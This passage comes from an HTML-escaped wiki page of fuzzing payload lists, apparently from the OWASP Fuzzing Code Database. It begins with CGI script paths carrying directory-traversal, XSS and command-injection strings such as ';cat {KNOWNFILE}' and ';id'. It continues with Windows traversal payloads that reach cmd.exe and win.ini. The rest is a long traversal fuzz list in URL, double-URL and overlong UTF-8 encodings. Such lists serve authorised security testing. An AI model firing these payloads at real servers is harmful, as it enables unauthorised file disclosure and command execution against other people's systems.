traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
